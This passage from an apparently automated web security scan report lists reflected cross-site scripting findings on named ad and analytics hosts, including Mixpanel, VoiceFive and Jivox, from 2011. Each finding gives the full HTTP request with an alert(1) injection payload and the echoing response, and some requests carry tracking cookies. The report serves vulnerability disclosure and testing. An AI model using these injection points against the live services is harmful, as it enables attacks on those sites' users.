The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ea105<script>alert(1)</script>760dc7e2979 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9yZWZlcnJlciI6ICJodHRwOi8vd3d3Lm1hdnNtb25leWJhbGwuY29tL21hdmVyaWNrcy10aWNrZXRzIiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwibXBfcGFnZSI6ICJodHRwOi8vd3d3LnRpcWlxLmNvbS9UaXFpcS9QdWJsaXNoZXJIb21lUGFnZS5hc3B4P1BlcmZvcm1lcklkcz01MTM7SW5jbEF3YXlHYW1lcyZQdWJsaXNoZXJJRD0xMDExMDMxJkJyYW5kSUQ9RW1wdHkmRXZlbnRDb3VudD01IiwidG9rZW4iOiAiY2QwYTRlMWZkOGQ5ZDIyYTg0NjMwY2IyODBkMjU5MzkiLCJ0aW1lIjogMTMwNzk2MzY1NH19&ip=1&callback=mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979&_=1307963654720 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:22:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:22:13 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 71

mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979(1);

4.65. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload dadcf<script>alert(1)</script>f22f0674cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3&n=ar_int_p20101109&1307963612571 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3("");

4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/iabplayer.php

Issue detail

The value of the clickTagURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 226ca"><script>alert(1)</script>5089f9eb91 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com226ca"><script>alert(1)</script>5089f9eb91&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:27 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 2196
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
hYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com226ca"><script>alert(1)</script>5089f9eb91" target="_blank">
...[SNIP]...

4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4e5'%3balert(1)//1db1bc5fdae was submitted in the adThumbnail parameter. This input was echoed as 3f4e5';alert(1)//1db1bc5fdae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5'%3balert(1)//1db1bc5fdae&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:00 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
<img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5';alert(1)//1db1bc5fdae" border="0" width="300" height="250" alt="" />
...[SNIP]...

4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561f6"-alert(1)-"9fdd048afed was submitted in the adThumbnail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:58 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
estartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL=&jvxSessionId=1307963038.2661");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}


4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the adVideoURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fef19"-alert(1)-"98015cf2c17 was submitted in the adVideoURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
te=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17&jvxSessionId=1307963045.8136");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}


4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the autoPlay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd00"-alert(1)-"646a0cac324 was submitted in the autoPlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:20 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxup
...[SNIP]...

4.71. http://as.jivox.com/player/jivox_ad_tags.php [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab7c"-alert(1)-"c02051b26b was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57659
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
p://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=190938ab7c"-alert(1)-"c02051b26b&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxha
...[SNIP]...

4.72. http://as.jivox.com/player/jivox_ad_tags.php [clickTagURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the clickTagURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c841c'%3balert(1)//719d9a49b95 was submitted in the clickTagURL parameter. This input was echoed as c841c';alert(1)//719d9a49b95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

